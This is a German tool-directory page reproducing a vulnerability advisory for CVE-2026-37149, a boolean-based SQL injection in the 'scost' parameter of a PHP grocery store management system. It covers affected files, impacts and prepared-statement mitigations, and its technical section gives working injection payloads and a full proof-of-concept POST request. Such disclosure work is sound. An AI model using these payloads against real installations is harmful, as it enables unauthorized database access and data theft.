Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-37149 — CVE-2026-37149 - SQL Injection vulnerability in the scost parameter of search_products.php in GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0. | Kitploit
Tools/GitHubGitHub/pateldhyeyit/cve-2026-37149
Vulnerability AnalysisWeb Application ExploitationInformation GatheringPenetration TestingLearning & EducationDatabase Security
GitHubpateldhyeyit/cve-2026-37149

CVE-2026-37149

CVE-2026-37149 - SQL Injection vulnerability in the scost parameter of search_products.php in GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0.

Repository anzeigen
2vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-37149 SQL-Injection in GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0

Übersicht

CVE-ID: CVE-2026-37149 Schwachstellentyp: SQL-Injection (CWE-89) Schweregrad: Hoch Entdecker: Dhyey Patel

Beschreibung

GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 enthält eine SQL-Injection-Schwachstelle im Parameter "scost" der Datei "/grocery/search_products.php".

Die Anwendung validiert benutzereingegebene Daten nicht ordnungsgemäß, bevor sie in SQL-Abfragen eingebettet werden. Ein Angreifer kann über den anfälligen Parameter manipulierte SQL-Ausdrücke injizieren und die Datenbankabfragen im Backend manipulieren.

Eine erfolgreiche Ausnutzung kann unbefugten Zugriff auf sensible Datenbankinformationen und die Ausführung beliebiger SQL-Anweisungen ermöglichen.

Betroffenes Produkt

Produkt: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN

Version: v1.0

Repository des Anbieters:

https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-

Betroffene Komponente

  • "/grocery/search_products.php"
  • POST-Parameter: "scost"

Angriffsart Remote

Informationen zum Anbieter Open-Source-Projekt, gepflegt vom Repository-Besitzer: https://github.com/anirudhkannanvp

Technische Details

Die Schwachstelle wurde mittels Boolean-basierter SQL-Injection-Techniken bestätigt.

Payload für TRUE-Bedingung

-1 OR 321=6 AND 000483=000483 --

Payload für FALSE-Bedingung

-1 OR 320=6 AND 000483=000483 --

Die Antworten der Anwendung unterschieden sich je nachdem, ob die injizierte Bedingung TRUE oder FALSE ergab, was die SQL-Injection bestätigt.

Weitere Tests bestätigten die erfolgreiche Ausführung von SQL-Funktionen, einschließlich:

SELECT database()

Der zurückgegebene Datenbankname war:

grocery

Dies zeigt, dass über den anfälligen Parameter beliebige SQL-Abfragen ausgeführt werden können.

Beweis des Konzepts

Anfrage

POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded

scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products

Ergebnis

Die Antwort ändert sich abhängig von der injizierten Booleschen Bedingung, was die SQL-Injection im Parameter "scost" bestätigt.

Auswirkungen

Mögliche Auswirkungen umfassen:

  • Datenbank-Enumeration
  • Offenlegung sensibler Informationen
  • Authentifizierungsumgehung
  • Datenextraktion
  • Änderung von Datenbankeinträgen

Gegenmaßnahmen

Entwickler sollten:

  1. Vorbereitete Anweisungen verwenden.
  2. Parametrisierte SQL-Abfragen verwenden.
  3. Numerische Eingabeparameter validieren.
  4. Serverseitige Eingabevalidierung implementieren.
  5. Direkte Verkettung von benutzergesteuerten Eingaben in SQL-Anweisungen vermeiden.

Referenzen OWASP SQL Injection https://owasp.org/www-community/attacks/SQL_Injection

MITRE CVE Program https://www.cve.org

Credits Entdeckt und gemeldet von: Dhyey Patel

Tool herunterladen